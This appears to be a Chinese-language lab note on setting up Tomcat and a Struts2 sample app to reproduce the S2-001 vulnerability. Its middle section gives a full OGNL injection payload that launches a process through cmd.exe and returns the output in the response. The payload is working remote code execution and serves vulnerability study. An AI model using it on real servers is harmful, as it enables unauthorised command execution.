環(huán)境

1、Windows x64 家庭版
2、java 1.8.0_144
3、tomcat 7.0.94

搭建java

1、下載java
2、搭建java環(huán)境

搭建tomcat

1、下載tomcat
2、搭建tomcat環(huán)境
3、解壓下載的zip，運(yùn)行bin/startup.bat，tomcat就運(yùn)行了，輸入http://127.0.0.1:8080/，訪問成功

搭建struts2

1、下載struts2,(github推薦使用chrome 的 Octo Mate插件，可下載單個文件)，其它下載

2、將war放到tomcat的webapps目錄下，運(yùn)行tomcat，webapps下的war包就會自動解壓
3、訪問http://127.0.0.1:8080/S2-001/

復(fù)現(xiàn)漏洞S2-001

1、驗證，輸入密碼%{1+1}

驗證.png

2、結(jié)果，返回2，存在漏洞

結(jié)果.png

3、利用payload彈出計算機(jī)

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cmd.exe", "/c", "calc"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

彈出計算機(jī)

圖片.png

IntelliJ IDEA搭建tomcat

將 Tomcat 安裝為系統(tǒng)服務(wù)，在 tomcat的bin目錄下，cmd 中運(yùn)行service.bat install, 提示安裝成功--->The service 'Tomcat7' has been installed,在系統(tǒng)服務(wù)找到它--->Apache Tomcat 7.0.94 Server。

在 cmd 中運(yùn)行 **service.bat install
1、下載IntelliJ IDEA，Ultimate版免費(fèi)
2、安裝IntelliJ IDEA
3、點(diǎn)擊Run---EDit Configurations...
4、點(diǎn)擊左側(cè)“+”號，找到Tomcat Server---Local（若是沒有找到Tomcat Server 可以點(diǎn)擊最后一行 34 items more）
5、在Tomcat Server -> Unnamed -> Server -> Application server項目下，點(diǎn)擊 Configuration ，找到本地 Tomcat 服務(wù)器，再點(diǎn)擊 OK按鈕

參考